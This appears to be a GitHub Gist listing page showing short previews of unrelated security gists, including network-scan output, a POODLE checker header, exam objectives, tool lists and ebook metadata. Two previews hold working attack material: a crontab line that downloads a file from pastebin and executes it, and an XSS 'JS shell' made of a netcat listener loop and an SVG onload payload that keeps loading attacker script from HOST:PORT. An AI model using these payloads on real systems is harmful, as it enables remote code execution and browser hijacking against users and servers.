This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Discovering Network | |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
root@setrus:~# netdiscover -r 192.168.56.0/24 | |
Currently scanning: Finished! | Screen View: Unique Hosts | |
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 | |
_____________________________________________________________________________ | |
IP At MAC Address Count Len MAC Vendor / Hostname |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <sched.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <sched.h> | |
#include <sys/stat.h> | |
#include <sys/types.h> | |
#include <sys/mount.h> | |
#include <stdio.h> | |
#include <stdlib.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
51 14 * * * wget -O /tmp/command https://pastebin.com/raw/1Ru7ms7t && chmod +x /tmp/command && /tmp/command |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# This script is just a small checker for hosts that may be vulnerable to POODLE. | |
# It tests all the hosts in the file "target_file.txt". | |
# Needed : | |
# 1) target_file.txt - with the ips to test | |
# 2) scan_result_utp.txt - list of the open ports for that host | |
# [@setrus == [email protected]] | |
# Poodle Testing for ALL the open ports of the hosts | |
# Must be run in the same file as target_file.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
<html xmlns="http://www.w3.org/1999/xhtml"> | |
<!-- | |
Modified from the Debian original for Ubuntu | |
Last updated: 2016-11-16 | |
See: https://launchpad.net/bugs/1288690 | |
--> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Exam Certification Objectives and Outcome Statements | |
1. Advanced Password Attacks | |
- The candidate will be able to user additional methods to attack password hashes and authenticate | |
2. Attacing Password hashes | |
- The candidate will be able to obtain and attack passwords hashes and other password representations | |
3. Escalation and Exploitation | |
- The candidate will be able to demonstrate the fundamental conepts of exploitation, data exfiltratrion from compromised hosts and pivoting to exploit other hosts within a target network. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SageMath | |
WinDbg Preview | |
Doker | |
GNU Radio |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://www.sans.org/reading-room/whitepapers/threats/malware-analysis-environment-design-artitecture-1841 | |
https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html | |
https://oalabs.openanalysis.net/2018/07/16/oalabs_malware_analysis_virtual_machine/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Document infos: | |
- Author = Peter Kim | |
- CreationDate = D:20180505020009+00'00' | |
- Creator = calibre 2.69.0 [https://calibre-ebook.com] | |
- Pages = 308 | |
- Producer = calibre 2.69.0 [https://calibre-ebook.com] | |
- Title = The Hacker Playbook 3: Practical Guide To Penetration Testing | |
- dc = {'publisher': ['Secure Planet'], 'description': {'x-default': None}, 'language': ['en'], 'creator': ['Peter Kim'], 'title': {'x-default': 'The Hacker Playbook 3: Practical Guide To Penetration Testing'}, 'date': ['2018-05-01T00:00:00+02:00'], 'subject': []} | |
- http://calibre-ebook.com/xmp-namespace = {'timestamp': '2018-05-03T18:05:43.134685+02:00', 'author_sort': 'Kim, Peter'} | |
- xap = {'Identifier': ['\n '], 'MetadataDate': '2018-05-05T04:00:09.811485+02:00'} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done | |
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)> |
OlderNewer